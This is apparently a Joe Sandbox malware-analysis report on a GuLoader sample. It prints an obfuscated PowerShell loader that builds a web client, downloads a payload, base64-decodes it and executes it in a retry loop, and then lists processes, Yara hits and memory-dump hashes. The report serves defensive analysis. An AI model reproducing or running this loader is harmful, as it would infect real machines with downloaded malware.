trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. 
HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. 
Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. 
sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
                                        Imagebase:0x1e0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2573987215.0000000008B40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2561974227.0000000005F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2574516885.0000000009DEA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:12:25:13
                                        Start date:23/05/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:12:25:38
                                        Start date:23/05/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe00000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f94cac51a84157eca01cb09276c5d51155fe85b6e7a1b3e4c25cc6430c06d893
                                          • Instruction ID: 005f058318ad6a02d093af6ff6de7660a2b68f4acd4c2ec7f147bea77b9e56cc
                                          • Opcode Fuzzy Hash: f94cac51a84157eca01cb09276c5d51155fe85b6e7a1b3e4c25cc6430c06d893
                                          • Instruction Fuzzy Hash: 28F1A33090CA8D8FEBA8EF28C8557E977D1FF54350F04426AD84DC72D1DB3899458B86
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 842e9bc22e9dfb823cfbdf7ba8d3bf50ad134f0dd3e0b675b280e7a164315b0a
                                          • Instruction ID: 70bf9c8fed0ca23cc1c7686b5b45093c95e1daec4129136b2feda69ef60edcfe
                                          • Opcode Fuzzy Hash: 842e9bc22e9dfb823cfbdf7ba8d3bf50ad134f0dd3e0b675b280e7a164315b0a
                                          • Instruction Fuzzy Hash: A6E1B13090CA8E8FEBA8EF28C8557E977E1EF54350F14426ED84DC7691DF78A9418B81
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2755080186.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 924868270108b68b4adbe708c91a78e394ff3b6ea6698930116a9e07d13a6f5e
                                          • Instruction ID: 0c8f4253cfbd90fabfbd24a4d731826ccd17112e7c5001b7d4b57255428097aa
                                          • Opcode Fuzzy Hash: 924868270108b68b4adbe708c91a78e394ff3b6ea6698930116a9e07d13a6f5e
                                          • Instruction Fuzzy Hash: 15D13231D1EE8A5FE7A6AB2858555B57BE0EF66354F0800FED04CC71D3EB1CA8058359
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2755080186.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0888dd33fb3f2c32dbbd4a9dac18e1842a8660085b47b946907c7c71f5263574
                                          • Instruction ID: 91fa5fd346b27f51760770d5d4bd532cf0dea00226713cd726df9608806a9701
                                          • Opcode Fuzzy Hash: 0888dd33fb3f2c32dbbd4a9dac18e1842a8660085b47b946907c7c71f5263574
                                          • Instruction Fuzzy Hash: 6EA1E431F0EA8B4FEB9AEB2854552B876E1EF54390F4801BAC54DC35D3DF1CA8408369
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2755080186.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ccf567c9dfaf0e7f6e9d8730085a8d97d525fdd4868c253cb22134406d58d56a
                                          • Instruction ID: c9dbc7064c221b64460f73844b83d93f764bfd86ab2226567e06bc09a1855fbc
                                          • Opcode Fuzzy Hash: ccf567c9dfaf0e7f6e9d8730085a8d97d525fdd4868c253cb22134406d58d56a
                                          • Instruction Fuzzy Hash: 3F410531E1EACA4FE796EB2858542B976E1EF45390F4900BAD10DD32D2DF1CAC44836A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction ID: 1d263df139ee799e0221237225f3f4c5236a0ef0a202e971a2d53809691abd9b
                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction Fuzzy Hash: 2501677111CB0C4FDB44EF0CE451AA5B7E0FB95364F50056EE58AC3695D736E881CB45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: N_^$N_^$N_^$N_^
                                          • API String ID: 0-3900292545
                                          • Opcode ID: 8479b95cffe73d918b44169d3daeb7b06e0ae8e93c2299a7ce5571949ce308e8
                                          • Instruction ID: f8afdaddedde69f77c34a6f8dcff3b2d7734c2954b8fa60ff21f73e87ba022c6
                                          • Opcode Fuzzy Hash: 8479b95cffe73d918b44169d3daeb7b06e0ae8e93c2299a7ce5571949ce308e8
                                          • Instruction Fuzzy Hash: 7931C973C1DED28EE36F5738A9A10F16B50EF51FA6F5901AAC0980A0D3EF286C16C745
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.qk
                                          • API String ID: 0-1364774114
                                          • Opcode ID: be9d4cc994d5ee555cc0abfe2c8adfa4e270adfb8a04bf31bfc902832e0a0065
                                          • Instruction ID: 213ae9679d3120d44f8781ebbf675792550cff586d3d8d7d0f97c74c64773cca
                                          • Opcode Fuzzy Hash: be9d4cc994d5ee555cc0abfe2c8adfa4e270adfb8a04bf31bfc902832e0a0065
                                          • Instruction Fuzzy Hash: 1E31F3B4B40204ABD304A764CA55BAE7AA3EFD4310F10C869FA016F791CF76AC05CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.qk$-qk
                                          • API String ID: 0-1497453550
                                          • Opcode ID: a855ced158b636f52458578cd14f767437889defdb75beff99579a02a2308d6b
                                          • Instruction ID: 677a98582be38f28dd08bcc442655395177da6215a956c186916b02aa5c11a3a
                                          • Opcode Fuzzy Hash: a855ced158b636f52458578cd14f767437889defdb75beff99579a02a2308d6b
                                          • Instruction Fuzzy Hash: AC92C2B0B11305CFDB64EB68C950B6ABBB2EFC5300F1484AAD9199B355CB35EC85CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.qk$-qk
                                          • API String ID: 0-3793507390
                                          • Opcode ID: c4c80781da958392e4213240bc6ad784bd866d94f867955663c4c94d501a308c
                                          • Instruction ID: 0530091fe2c1c990255573a6d7fb7e74918a2c894c4f8514768dc80ea04ca237
                                          • Opcode Fuzzy Hash: c4c80781da958392e4213240bc6ad784bd866d94f867955663c4c94d501a308c
                                          • Instruction Fuzzy Hash: 5FD19CB0B402099FC714EB68C650B9EBBB2AFC4310F15C86AE9156F355CB75EC46CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-1480752206
                                          • Opcode ID: 6b34eeb9db77ad3fb696a253a0e55af8a69e9a13c4a81cd9b1986f3313d8c79d
                                          • Instruction ID: 8c6eed47dd14f271a050e5dd345a486d69135771a445ef06b2c06f36099c7ee0
                                          • Opcode Fuzzy Hash: 6b34eeb9db77ad3fb696a253a0e55af8a69e9a13c4a81cd9b1986f3313d8c79d
                                          • Instruction Fuzzy Hash: 61C15EB2700206CFDB64AB68D95067BBBF6EFD1311F14847AD865CB251DB31C849CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$x.qk$x.qk$-qk
                                          • API String ID: 0-2645119150
                                          • Opcode ID: 3ae4de424d2da4806257c4b0328f91220a4a04829f78c8a61ccf7dcd45959a63
                                          • Instruction ID: dc49c53b4bef55f3319d711d43182011781629d3f93edd5a4d4399aa3eeeda8f
                                          • Opcode Fuzzy Hash: 3ae4de424d2da4806257c4b0328f91220a4a04829f78c8a61ccf7dcd45959a63
                                          • Instruction Fuzzy Hash: 4BF1A1B0B402159FD764DB18CA50BAABBB7AF84300F1088A9D509AF795CB35ED85CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$x.qk$-qk
                                          • API String ID: 0-189680634
                                          • Opcode ID: 0e9e2a824ffabfd6c8a99bce8638683483eb36138de38775bec745e000e3c115
                                          • Instruction ID: fa2e2cfefb5043d900b8977f705f78463060c99dd53244c5e751e2e1b6a4608e
                                          • Opcode Fuzzy Hash: 0e9e2a824ffabfd6c8a99bce8638683483eb36138de38775bec745e000e3c115
                                          • Instruction Fuzzy Hash: FEB1B0B4A002059FCB14EF64C594B9DBBB2EFC8314F15C86AE8256F395CB35E846CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$$]q$$]q$$]q
                                          • API String ID: 0-2353078639
                                          • Opcode ID: 353275aafbdddb2ccf6cb565d3c3043cf09e6ade7fdfb2d0c56486fc5892e3bb
                                          • Instruction ID: 4284ac02c9baf22e2b4f38eabb0d2d54d62710cb1278e79104709a1916963e77
                                          • Opcode Fuzzy Hash: 353275aafbdddb2ccf6cb565d3c3043cf09e6ade7fdfb2d0c56486fc5892e3bb
                                          • Instruction Fuzzy Hash: F05135B1704346DFEBA9AF68C950566BBF1AFC2210F18C4ABD8A58B253DB35C800C756
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84~l$84~l$tP]q$tP]q
                                          • API String ID: 0-1199993865
                                          • Opcode ID: 438719426475659df456b299ae61bd40b2b761247c7f53fbbf958723ceaf22a3
                                          • Instruction ID: c76f617c111254d4cc4a9bdf492e99379c9943ae4f17bf111d35acb2f55abc17
                                          • Opcode Fuzzy Hash: 438719426475659df456b299ae61bd40b2b761247c7f53fbbf958723ceaf22a3
                                          • Instruction Fuzzy Hash: 2782B0B0B50205CFCB54DBA8CA40A6ABBB2EFC5304F64C4A9D9159F355CB36EC46CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84~l$tP]q
                                          • API String ID: 0-632405432
                                          • Opcode ID: 500e62afc789eb2b47f24aac17cd4afda40c7fc576a8a73d24ba81cfa1c3664f
                                          • Instruction ID: fbf3c5b46e5098b7a8cde0db0147e002a12276ee3de69b2dcbcb9080fefe8f90
                                          • Opcode Fuzzy Hash: 500e62afc789eb2b47f24aac17cd4afda40c7fc576a8a73d24ba81cfa1c3664f
                                          • Instruction Fuzzy Hash: 005154B46093819FDB669B24C951A29BFB1EF86210F0DC0DBD4A48F2A3C731DC45C7A2
                                          Strings
                                          Memory Dump Source